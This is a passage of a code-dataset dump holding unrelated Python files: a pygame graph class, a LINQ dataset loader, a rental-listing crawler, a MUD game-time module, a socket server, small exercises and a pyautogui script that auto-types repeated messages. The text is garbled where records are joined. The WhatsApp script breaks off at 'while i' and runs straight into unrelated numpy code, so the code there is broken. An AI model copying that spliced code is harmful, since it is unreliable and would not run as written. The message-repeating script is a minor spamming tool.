color=\"blue\"))\n elif choice == 4:\n Youtube.videoInfo()\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"abdulaziz5alsharji/random-python-projects","sub_path":"YoutubeDownloaderV3.py","file_name":"YoutubeDownloaderV3.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"452602726","text":"\"\"\" l_relu.py\n practice for relu\n\"\"\"\n\nimport tensorflow as tf\n\n\ndef l_relu():\n \"\"\" l_rely\"\"\"\n layer_1 = tf.keras.layers.ReLU()\n print(layer_1([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n # define max_value\n layer_2 = tf.keras.layers.ReLU(max_value=4.0)\n print(layer_2([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n # define threshold\n layer_3 = tf.keras.layers.ReLU(threshold=1.5)\n print(layer_3([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n # define negative_slope\n layer_4 = tf.keras.layers.ReLU(negative_slope=1.0)\n print(layer_4([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy())\n\n layer_5 = tf.keras.layers.LeakyReLU(alpha=1.0)\n print(layer_5([-3.0, -1.0, 0.0, 1.0, 5.0]).numpy()) # layer_4 has same results with layer_5\n\n\nl_relu()\n","repo_name":"BestNico/MLHandsBook","sub_path":"chapter_11/activation_layer/l_relu.py","file_name":"l_relu.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29819480678","text":"import pygame\nimport math\nfrom pygamegraph.constants import Constants\nfrom pygamegraph.text import Text\n\n\nclass BaseGraph(pygame.sprite.Sprite):\n \"\"\"\n Base graph class\n \"\"\"\n def __init__(\n self,\n size: tuple,\n x: list,\n y: list,\n text_size: int = 20\n ):\n \"\"\"\n :param size:\n :param x: first list\n :param y: second list\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.x_list = x\n self.y_list = y\n self.size = size # size of graph\n self.xscale = len(self.x_list) or 1\n self.yscale = 10\n self.grid = False\n self.color = Constants.BLACK.value\n self.line_color = Constants.BLACK.value # line color\n self.line_width = 1\n self.xpart_size = self.size[0] / self.xscale\n self.image = pygame.Surface(size, 5)\n self.image.fill(Constants.BLACK.value)\n self.rect = self.image.get_rect()\n # self.y_top_text = Text(text_size) # print max(self.y_list) on the left-top edge\n # self.x_bottom_text = Text(text_size) # print last element self.x_list on the right-bottom edge\n self.title = Text(text_size)\n self.xlabel = Text(text_size) # name of x axis\n self.ylabel = Text(text_size) # name of y axis\n self.ylabel.angle = 90\n\n @staticmethod\n def _compress(lst):\n step = 2\n finaly_len = len(lst) // step\n i = 0\n while len(lst) > finaly_len:\n step = step if step <= len(lst[i:]) else len(lst[i:])\n if max(lst) in lst[i:step + i]:\n lst[i] = max(lst)\n elif min(lst) in lst[i:step + i]:\n lst[i] = min(lst)\n else:\n lst[i] = math.ceil(sum(lst[i:step + i]) / len(lst[i:step + i]))\n for _ in range(step - 1):\n lst.pop(i + 1)\n i += 1\n return lst\n\n def update(self):\n self.ylabel.update(xy=(\n (self.rect.left - self.ylabel.size // 2) - self.ylabel.size - len(str(max(self.y_list))),\n (self.size[1] - self.rect.top) // 2),\n color=Constants.BLACK.value\n )\n self.xlabel.update(xy=(self.rect.centerx, self.rect.bottom + self.xlabel.size),\n color=Constants.BLACK.value)\n self.title.update(xy=(self.rect.centerx, self.rect.top - self.title.size),\n color=Constants.BLACK.value)\n self.xscale = len(self.x_list)\n\n def draw_grid(self):\n for xpart in range(self.xscale):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.color,\n (self.rect.left + (xpart * self.xpart_size), self.rect.bottom),\n (self.rect.left + (xpart * self.xpart_size), self.rect.top),\n 1\n )\n for ypart in range(1, self.yscale):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.color,\n (\n self.rect.left, self.rect.bottom - ((self.size[1] // 10) * ypart)\n ),\n (\n self.rect.right, self.rect.bottom - ((self.size[1] // 10) * ypart)\n ),\n 1\n )\n\n def draw_values(self):\n max_y_list = max(self.y_list)\n for xpart in range(self.xscale):\n number = Text(15)\n number.update(\n text=f'{self.x_list[xpart]}',\n xy=(self.rect.left + (xpart * self.xpart_size), self.rect.bottom + number.size // 2),\n color=Constants.BLACK.value\n )\n number.draw()\n y_num_len = len(str(max(self.y_list)))\n for ypart in range(1, self.yscale):\n number = Text(15)\n number.update(\n text=f'{(max_y_list / 10) * ypart:.{y_num_len + 1}}',\n xy=(\n self.rect.left - number.size - len(str(max_y_list)) // 2,\n self.rect.bottom - ((self.size[1] // 10) * ypart) - (number.size / 3)\n ),\n color=Constants.BLACK.value\n )\n number.draw()\n\n def draw(self):\n self.xscale = len(self.x_list) or 1\n self.xpart_size = self.size[0] / self.xscale\n pygame.draw.rect(pygame.display.get_surface(), self.color, self, self.line_width)\n max_y_list = max(self.y_list)\n percent = self.size[1] / max_y_list\n self.title.draw()\n self.ylabel.draw()\n self.xlabel.draw()\n if self.grid:\n self.draw_grid()\n self.draw_values()\n for part in range(self.xscale-1):\n pygame.draw.line(\n pygame.display.get_surface(),\n self.line_color,\n (\n self.rect.left + part * self.xpart_size,\n self.rect.bottom - self.y_list[part] * percent\n ),\n (\n self.rect.left + (part + 1) * self.xpart_size,\n self.rect.bottom - self.y_list[part+1] * percent\n ),\n 2\n )\n","repo_name":"vallenov/pygamegraph","sub_path":"pygamegraph/base_graph.py","file_name":"base_graph.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41340925604","text":"# import pywhatkit as pyw\n# pyw.sendwhatmsg('+923460864256' , 'wellcome to ansab' , 11,15)\nimport pyautogui as pt\nimport time\n\nlimit = input(\"Enter Limit : - \")\nmesssage = input(\"Enter Message : -\")\n\ni=0\n\ntime.sleep(2)\nwhile i = cond_num):\r\n B = tildeB*np.sqrt(DeT)\r\n break\r\n u = generate_u_triangle(num)\r\n n = np.random.multivariate_normal([0, 0], B, num).T\r\n data.append(u+n)\r\n\r\npUMatr, pdfs_of_subjects, positions, xmin, xmax, ymin, ymax, dimx, dimy = est_common_density2D(data, bw_method=h, outliers=0,\r\n dimx=100, xmin=-50, xmax=50,\r\n dimy=100, ymin=-50, ymax=50)\r\nfor j in range(0, vnum):\r\n counter_plt = j - 16*int(j/16)\r\n # --------------------------------------------------#\r\n row = counter_plt % 4\r\n col = int(counter_plt/4)\r\n if row == col == 0: f1, axarr1 = plt.subplots(4, 4, figsize=(12, 10))\r\n axarr1[row, col].imshow(pdfs_of_subjects[j], origin='lower', interpolation='nearest',\r\n cmap=plt.cm.gist_earth_r,\r\n extent=[xmin, xmax, ymin, ymax],\r\n vmin=None, vmax=None)\r\n axarr1[row, col].plot(data[j][0], data[j][1], 'k.', markersize=0.03)\r\n #axarr1[row, col].set_title(str(j+1))\r\n axarr1[row, col].set_xlim(xmin, xmax)\r\n axarr1[row, col].set_ylim(ymin, ymax)\r\n axarr1[row, col].set_xticks([xmin*2/3, 0, xmax*2/3])\r\n axarr1[row, col].set_yticks([ymin*2/3, 0, ymax*2/3])\r\n axarr1[row, col].tick_params(axis='both', which='major', labelsize=10)\r\n axarr1[row, col].set_axis_off()\r\n\r\nx1, x2 = np.meshgrid(np.linspace(xmin, xmax, num=dimx, endpoint=True, retstep=False, dtype=None), np.linspace(ymin, ymax, num=dimy, endpoint=True))\r\npos = np.vstack([x1.ravel(), x2.ravel()])\r\nvalues = np.hstack(data)\r\nkernel = scipy.stats.gaussian_kde(values, bw_method=h)\r\npdfAll = np.reshape(kernel.evaluate(pos).T, x1.shape)\r\n\r\nu = generate_u_triangle(num)\r\nkernel2 = scipy.stats.gaussian_kde(u, bw_method=h)\r\npdfGround_truth = np.reshape(kernel2.evaluate(pos).T, x1.shape)\r\n\r\nfig, axs = plt.subplots(1, 3, figsize=(9, 3), sharey=True)\r\naxs[2].imshow(pdfGround_truth, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[2].set_axis_off()\r\naxs[0].imshow(pdfAll, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[0].set_axis_off()\r\naxs[1].imshow(pUMatr, origin='lower', interpolation='nearest', cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax], vmin=None, vmax=None)\r\naxs[1].set_axis_off()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"andreyzhitnikov/common_statistics","sub_path":"common_density_demo.py","file_name":"common_density_demo.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8224876215","text":"import json\nfrom appium.webdriver.common.touch_action import TouchAction as TA\nfrom common.exceptionList import ScriptFailure\n\nclass DeviceUtils:\n\n def isPlatform(self, platform):\n return self.settings.platform_name == str(platform).lower()\n\n def onScreenSwipe(self, start, dirOrEnd):\n '''\n This is a method to swipe on the screen in the direction passed as the parameter starting from the start parameter\n :param start: This is the co-ordinates or element for the initial tap\n :param dir: This is the direction in which the tapped location is to be dragged. Accepted dir: \"left\", \"right\", \"up\", \"down\" or it should be a Dict as {\"x\": value, \"y\": value}\n :return: \n :Use: This will be mainly used to swipe delete elements or close tabs.\n '''\n if type(dirOrEnd) is str:\n end = {\n 'x': None,\n 'y': None\n }\n #max = self.driver.get_window_size()\n if dirOrEnd.lower() == \"left\":\n end['x'] = -100 #if start['x']>100 else 1\n end['y'] = 0\n elif dirOrEnd.lower() == \"right\":\n end['x'] = 100 #if start['x']100 else 1\n elif dirOrEnd.lower() == \"down\":\n end['x'] = 0\n end['y'] = 100 #if start['y'](\\d+)米', res_murl.text)\n item['distance'] = flag and flag[0] or None\n\n except TimeoutError:\n item['longitude'] = None\n item['latitude'] = None\n item['distance'] = None\n print(\"获取经纬度与距离信息失败,m_url:{}\".format(item['m_url']))\n\n self.collections.update_one({\"m_url\": item[\"m_url\"]}, {\"$set\": item}, upsert=True)\n self.count += 1\n print(\"第{}条保存成功:{}\".format(self.count, item))\n\n @staticmethod\n def _parse_house_tags(house_tags):\n if house_tags:\n tags = \"\"\n for tag in house_tags:\n tags += tag.get(\"name\")\n return tags.strip()\n\n def _write_bc_list_to_text(self, bc_lists):\n with open(self.txt_path, 'w') as f:\n for bc_list in bc_lists:\n f.write(bc_list + \"\\n\")\n\n def _read_bc_list_from_text(self):\n with open(self.txt_path, \"r\") as f:\n return [line.strip() for line in f.readlines()]\n\n\nif __name__ == \"__main__\":\n p = ThreadPool(4)\n\n rent = Rent()\n rent.get_data_second([p])\n","repo_name":"ErisYoung/Crawler-Analysis","sub_path":"lianjia_BSGS/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71038234175","text":"tasks = []\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# میخواهیم لیستی از کار هایی که در یک روز باید انجام دهیم را تحت\n# عنوان یک لیست نگه داری کنیم و نمایش دهیم\nclass Task:\n title = None\n description = None\n is_done = False\n\n def __init__(self, title, description) -> None:\n self.title = title\n self.description = description\n\n def done(self):\n self.is_done = True\n\n def __str__(self) -> str:\n done = \"x\" if self.is_done else \"-\"\n return f\"[{done}] {self.title.ljust(10)} '{self.description}'\"\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# لیستی از تسکها میسازیم\ntasks.append(Task(\"Buy\", \"Buy soda for dinner\"))\ntasks.append(Task(\"Gym\", \"Go to gym\"))\ntasks.append(Task(\"Mail\", \"Send mail to Office\"))\ntasks.append(Task(\"Wash your Car\", \"\"))\ntasks.append(Task(\"Buy\", \"Buy a pen\"))\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# تمرین ۱\n# آیا میتوانید دو تسک دیگر نیز به این لیست اضافه کنید؟\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# تمرین ۲\n# آیا میتوانید به کلاس تسک یک ویژگی دیگر اضافه کنید؟ اولویت و اهمیت\n# هر تسک چقدر است؟ کم، ��توسط، زیاد\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# دو تا از تسکهایی که ساخته ایم را در حالت انجام شده قرار میدهیم\ntasks[1].done()\ntasks[2].done()\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# تسکهایی که ساخته ایم را نمایش میدهیم\nfor task in tasks:\n print(task)\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# تمرین ۳\n# آیا میتوانید لیست تسکها را با حلقه\n# while\n# نمایش دهید؟\n\n###~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# تمرین ۴\n# آیا میتوانید لیست تسکها را در یک فایل ذخیره کنید؟","repo_name":"sh-navid/Archive.Learn.Python","sub_path":"lessons/python/exercises/exercise-general-week-05-09.py","file_name":"exercise-general-week-05-09.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"pnb","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"6260759173","text":"import numpy as np\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader, random_split\n\nfrom preprocess_data import pad_sequence\nfrom utils.linq_translation_data import TranslationFileIterator\n\n\ndef convert_seq_to_target(src_values, tgt_values, max_input_seq_length, eos_value: int=2):\n src_length = len(src_values)\n if src_length < max_input_seq_length:\n src_values = pad_sequence(src_values, eos_value, max_input_seq_length)\n src_length = max_input_seq_length\n tgt_values = pad_sequence(tgt_values, eos_value, max_input_seq_length)\n data_x = []\n data_y = []\n for i in range(0, src_length - max_input_seq_length):\n seq_in = src_values[i:i + max_input_seq_length]\n output_char = tgt_values[i]\n data_x.append(seq_in)\n data_y.append(output_char)\n return data_x, data_y\n\n\ndef convert_translation_file_to_csv(txt_file_path: str=\"../data/linq-sample.txt\",\n output_file_path: str=\"./output/linq-sample.csv\",\n max_input_seq_length: int=100,\n eos_value: int=2):\n file_iter = TranslationFileIterator(txt_file_path)\n with open(output_file_path, \"w\", encoding='utf-8') as csv:\n csv.write('features\\tlabel\\n')\n for src_values, tgt_values in file_iter:\n ds_features, ds_label = convert_seq_to_target(src_values, tgt_values, max_input_seq_length, eos_value=eos_value)\n for features, label in zip(ds_features, ds_label):\n csv.write(','.join(str(x) for x in features))\n csv.write('\\t')\n csv.write(str(label))\n csv.write('\\n')\n\ndef comma_str_to_array(df):\n return df.map(lambda l: np.array([int(n) for n in l.split(',')], dtype=np.float16))\n\nclass Linq2TSqlDataset(Dataset):\n def __init__(self, csv_file_path):\n self.df = df = pd.read_csv(csv_file_path, sep='\\t')\n self.df_features = comma_str_to_array(df['features'])\n self.df_label = df['label']\n self.features = torch.tensor(self.df_features).long()\n self.label = torch.tensor(self.df_label).long()\n\n def __len__(self):\n return len(self.features)\n\n # This returns given an index the i-th sample and label\n def __getitem__(self, idx):\n return self.features[idx], self.label[idx]\n\n def create_dataloader(self, batch_size=32):\n train_size = int(0.8 * len(self))\n val_size = len(self) - train_size\n train_data, val_data = random_split(self, [train_size, val_size])\n train_loader = DataLoader(train_data, batch_size=batch_size)\n val_loader = DataLoader(val_data, batch_size=batch_size)\n return train_loader, val_loader\n\nif __name__ == '__main__':\n convert_translation_file_to_csv()\n # ds = Linq2TSqlDataset('./output/linq-sample.csv')\n # train_loader, val_loader = ds.create_dataloader()\n # for item in val_loader:\n # print(f\"{item=}\")\n\n","repo_name":"flashlin/Samples","sub_path":"Tempermonkey-vue3-tfjs/torch/labs/prepare5.py","file_name":"prepare5.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"995326275","text":"# URLify: Write a method to replace all spaces in a string with '%20'. You may assume that the string has sufficient space at the end to hold the additional characters, and that you are given the \"true\" length of the string. \n# O(N)\n\nimport unittest\n\ndef urlify(string, length):\n\tchar_array = [None] * length\n\tactive_space = True # Make sure we start with a character, not a space\n\ti = 0\n\tfor char in string:\n\t\tif i == length:\n\t\t\tbreak\n\t\tif char != ' ':\n\t\t\tchar_array[i] = char\n\t\t\ti += 1\n\t\t\tactive_space = False\n\t\telif active_space is False:\n\t\t\tchar_array[i] = '%20'\n\t\t\ti += 1\n\t\t\tactive_space = True\n\treturn ''.join(char_array)\n\nclass Test(unittest.TestCase):\n\t'''Test Cases'''\n\tdata = [\n\t\t('Mr John Smith ', 13,'Mr%20John%20Smith'),\n\t\t('Moe is tired', 12, 'Moe%20is%20tired'),\n\t\t(\" Leading spaces don't count\", 26, \"Leading%20spaces%20don't%20count\"),\n\t]\n\t\n\tdef test_urlify(self):\n\t\tfor [test_string, length, expected] in self.data:\n\t\t\tactual = urlify(test_string, length)\n\t\t\tself.assertEqual(actual, expected)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","repo_name":"chasebleyl/ctci","sub_path":"data-structures/interview-questions/arrays_and_strings/1_3.py","file_name":"1_3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2137497679","text":"#twig is the main computer\nimport socket\nimport netifaces\nfrom netifaces import AF_INET\nimport threading\nimport struct\nimport time\n\nclass twig:\n def __init__(self, ip, port, methods):\n \n self.methods = methods\n self.host = ip #\"0.0.0.0\"#192.168.1.102\n self.port = port\n #print(netifaces.ifaddresses('wlp2s0')[AF_INET][0]['addr'])\n self.socketOpener()\n \n def socketOpener(self):\n self.mySocket = socket.socket()\n self.mySocket.bind((self.host,self.port))\n\n def getConnection(self):\n self.mySocket.listen(1)\n self.conn, self.addr = self.mySocket.accept()\n print (\"Connection from: \" + str(self.addr))\n\n return True\n\n def listener(self): \n print('HERE WE ARE')\n self.methods[\"console\"]('L010 | Attempting to Open Listener')\n #self.mySocket.setblocking(0)\n data = b''\n result = self.conn.recv(65536)\n start = time.time()\n data += result\n while(len(result) > 0):\n if(result[-3:] == b'END'):\n break\n result = self.conn.recv(65536)\n data += result\n \n return data.decode()\n\n #return ''.join(str(total_data))\n \n def sendMessage(self, message):\n #message = str(struct.pack('>I', len(str(message)))) + '|' + str(message)\n self.conn.sendall((str(message)+'|END').encode())\n \n def socketCloser(self):\n self.conn.close()\n \n def close(self):\n print('close - twig')\n self.conn.close()\n\n\n#twig = twig(5000)\n#twig.socketCloser()\nprint('Done - Twig')\n","repo_name":"MarcDAFrame/SynapSys","sub_path":"twig/TOOLKIT/twig.py","file_name":"twig.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11402917452","text":"\"\"\"\nThe gametime module handles the global passage of time in the mud.\n\nIt also supplies some useful methods to convert between\nin-mud time and real-world time as well allows to get the\ntotal runtime of the server and the current uptime.\n\"\"\"\n\nfrom django.conf import settings\nfrom src.scripts.scripts import Script\nfrom src.scripts.models import ScriptDB\nfrom src.utils.create import create_script\nfrom src.utils import logger\n\n# name of script that keeps track of the time\n\nGAME_TIME_SCRIPT = \"sys_game_time\"\n\n# Speed-up factor of the in-game time compared\n# to real time.\n\nTIMEFACTOR = settings.TIME_FACTOR\n\n# Common real-life time measures, in seconds.\n# You should not change these.\n\nREAL_TICK = max(1.0, settings.TIME_TICK) #Smallest time unit (min 1s)\nREAL_MIN = 60.0 # seconds per minute in real world\n\n# Game-time units, in real-life seconds. These are supplied as\n# a convenient measure for determining the current in-game time,\n# e.g. when defining events. The words month, week and year can\n# of course mean whatever units of time are used in the game.\n\nTICK = REAL_TICK * TIMEFACTOR\nMIN = REAL_MIN * TIMEFACTOR\nHOUR = MIN * settings.TIME_MIN_PER_HOUR\nDAY = HOUR * settings.TIME_HOUR_PER_DAY\nWEEK = DAY * settings.TIME_DAY_PER_WEEK\nMONTH = WEEK * settings.TIME_WEEK_PER_MONTH\nYEAR = MONTH * settings.TIME_MONTH_PER_YEAR\n\nclass GameTime(Script):\n \"\"\"\n This sets up an script that keeps track of the\n in-game time and some other time units.\n \"\"\"\n def at_script_creation(self):\n \"\"\"\n Setup the script\n \"\"\"\n self.key = \"sys_game_time\"\n self.desc = \"Keeps track of the game time\"\n self.interval = REAL_MIN # update every minute\n self.persistent = True\n self.start_delay = True\n self.attr(\"game_time\", 0.0) #IC time\n self.attr(\"run_time\", 0.0) #OOC time\n self.attr(\"up_time\", 0.0) #OOC time\n\n def at_repeat(self):\n \"\"\"\n Called every minute to update the timers.\n \"\"\"\n # We store values as floats to avoid drift over time\n game_time = float(self.attr(\"game_time\"))\n run_time = float(self.attr(\"run_time\"))\n up_time = float(self.attr(\"up_time\"))\n self.attr(\"game_time\", game_time + MIN)\n self.attr(\"run_time\", run_time + REAL_MIN)\n self.attr(\"up_time\", up_time + REAL_MIN)\n\n def at_start(self):\n \"\"\"\n This is called once every server restart.\n We reset the up time.\n \"\"\"\n self.attr(\"up_time\", 0.0)\n\n# Access routines\n\ndef gametime_format(seconds):\n \"\"\"\n Converts the count in seconds into an integer tuple of the form\n (years, months, weeks, days, hours, minutes, seconds) where\n several of the entries may be 0.\n\n We want to keep a separate version of this (rather than just\n rescale the real time once and use the normal realtime_format\n below) since the admin might for example decide to change how many\n hours a 'day' is in their game etc.\n \"\"\"\n # have to re-multiply in the TIMEFACTOR\n # do this or we cancel the already counted\n # timefactor in the timer script...\n sec = int(seconds * TIMEFACTOR)\n years, sec = sec/YEAR, sec % YEAR\n months, sec = sec/MONTH, sec % MONTH\n weeks, sec = sec/WEEK, sec % WEEK\n days, sec = sec/DAY, sec % DAY\n hours, sec = sec/HOUR, sec % HOUR\n minutes, sec = sec/MIN, sec % MIN\n return (years, months, weeks, days, hours, minutes, sec)\n\ndef realtime_format(seconds):\n \"\"\"\n As gametime format, but with real time units\n \"\"\"\n sec = int(seconds)\n years, sec = sec/29030400, sec % 29030400\n months, sec = sec/2419200, sec % 2419200\n weeks, sec = sec/604800, sec % 604800\n days, sec = sec/86400, sec % 86400\n hours, sec = sec/3600, sec % 3600\n minutes, sec = sec/60, sec % 60\n return (years, months, weeks, days, hours, minutes, sec)\n\ndef gametime(format=False):\n \"\"\"\n Find the current in-game time (in seconds) since the start of the mud.\n The value returned from this function can be used to track the 'true'\n in-game time since only the time the game has actually been active will\n be adding up (ignoring downtimes).\n\n format - instead of returning result in seconds, format to (game-) time\n units.\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n game_time = int(script.attr(\"game_time\"))\n if format:\n return gametime_format(game_time)\n return game_time\n\ndef runtime(format=False):\n \"\"\"\n Get the total actual time the server has been running (minus downtimes)\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n run_time = int(script.attr(\"run_time\"))\n if format:\n return realtime_format(run_time)\n return run_time\n\ndef uptime(format=False):\n \"\"\"\n Get the actual time the server has been running since last downtime.\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n up_time = int(script.attr(\"up_time\"))\n if format:\n return realtime_format(up_time)\n return up_time\n\n\ndef gametime_to_realtime(secs=0, mins=0, hrs=0, days=0,\n weeks=0, months=0, yrs=0):\n \"\"\"\n This method helps to figure out the real-world time it will take until a in-game time\n has passed. E.g. if an event should take place a month later in-game, you will be able\n to find the number of real-world seconds this corresponds to (hint: Interval events deal\n with real life seconds).\n\n Example:\n gametime_to_realtime(days=2) -> number of seconds in real life from now after which\n 2 in-game days will have passed.\n \"\"\"\n real_time = secs/TIMEFACTOR + mins*MIN + hrs*HOUR + \\\n days*DAY + weeks*WEEK + months*MONTH + yrs*YEAR\n return real_time\n\ndef realtime_to_gametime(secs=0, mins=0, hrs=0, days=0,\n weeks=0, months=0, yrs=0):\n \"\"\"\n This method calculates how large an in-game time a real-world time interval would\n correspond to. This is usually a lot less interesting than the other way around.\n\n Example:\n realtime_to_gametime(days=2) -> number of game-world seconds\n corresponding to 2 real days.\n \"\"\"\n game_time = TIMEFACTOR * (secs + mins*60 + hrs*3600 + days*86400 + \\\n weeks*604800 + months*2419200 + yrs*29030400)\n return game_time\n\n\n# Time administration routines\n\ndef init_gametime():\n \"\"\"\n This is called once, when the server starts for the very first time.\n \"\"\"\n # create the GameTime script and start it\n game_time = create_script(GameTime)\n game_time.start()\n","repo_name":"YourCyborg/Sun-RPI","sub_path":"src/utils/gametime.py","file_name":"gametime.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"10394328943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# coding=utf-8\n\"\"\"\n116. 填充每个节点的下一个右侧节点指针\n\"\"\"\nfrom laozhang import Node\n\n\nclass Solution:\n \"\"\"\n 思路:\n 1.第一步首先讲父节点的左右子节点连起来\n 2.第二步连接其他节点\n 3.递归重复\n \"\"\"\n\n def connect(self, root: 'Node') -> 'Node':\n\n def dfs(root: Node):\n if root:\n if root.left and root.right:\n # 连接左右子节点\n root.left.next = root.right\n # 关键步骤通过1步骤构建的连接来讲同一层的所有节点连接起来\n if root.next:\n root.right.next = root.next.left\n dfs(root.left)\n dfs(root.right)\n\n dfs(root)\n return root\n","repo_name":"jxnu-liguobin/cs-summary-reflection","sub_path":"python-leetcode/laozhang/tree/leetcode_116_.py","file_name":"leetcode_116_.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"zh","doc_type":"code","stars":524,"dataset":"github-code","pt":"79"} +{"seq_id":"20282946481","text":"from flask import Flask, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\ndb = SQLAlchemy()\nmail = Mail()\n\n\ndef create_app(settings_override=None):\n \"\"\"\n Create a Flask application using the factory pattern.\n :param settings_override: dict Override default app settings\n :return: Flask app\n \"\"\"\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_object('config.settings')\n app.config.from_pyfile('settings', silent=True)\n if settings_override:\n app.config.update(settings_override)\n # Extensions\n db.init_app(app)\n mail.init_app(app)\n # Logging\n app_logger(app)\n # Blueprints\n from app.blueprints.user.routes import user\n app.register_blueprint(user, url_prefix='/api/v1')\n\n @app.route('/health')\n def health_check():\n app.logger.info('Got request to /health route')\n return jsonify({'response': {'message': 'App is healthy'}}), 200\n\n return app\n\n\ndef app_logger(app):\n \"\"\"\n Set up logger for the app.\n :param app: The Flask app\n :return: None\n \"\"\"\n format_string = (\n '=================================================================\\n'\n '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s\\n'\n '=================================================================\\n'\n )\n formatter = logging.Formatter(format_string)\n handler = RotatingFileHandler(filename='logs/app.log', maxBytes=10000000,\n backupCount=1)\n handler.setLevel(app.config['LOG_LEVEL'])\n handler.setFormatter(formatter)\n app.logger.addHandler(handler)\n return\n","repo_name":"mikaelm1/flask-api-boilerplate","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"2128835883","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\n题目1\n1.编写如下程序\na.用户输入1-7七个数字,分别代表周一到周日\nb.如果输入1~5,打印对应的“周一”~“周五”,如果输入的数字是6或7,打印输出“周末”\nc.如果输入0,退出循环\nd.输入其他内容,提示:“输入有误,请重新输入!”\n提示:本题可以使用if和while循环,同时需要校验用户的输入是否正确\n\"\"\"\n\n# def week():\n# list_int = [1,2,3,4,5,6,7]\n# list_day = [\"周一\",\"周二\",'周三','周四','周五','周末','周末']\n# i=1\n# while i<=7:\n# day = input(\"请输入数字1-7:\")\n# day = int(day)\n# if day in list_int:\n# print(list_day[day-1])\n# elif day == 0:\n# break\n# else:\n# print(\"输入有误,请重新输入!\")\n# i += 1\n#\n# week()\n\n\n# 字典\n# def week():\n# dict_day = {'1': \"周一\", \"2\": \"周二\", '3': '周三', '4': '周四', '5': '周五', '6': '周末', '7': '周末'}\n# i = 1\n# while i <= 7:\n# day = input(\"请输入数字1-7:\")\n# if day in dict_day.keys():\n# print(dict_day[day])\n# i += 1\n# elif int(day) == 0:\n# break\n# else:\n# 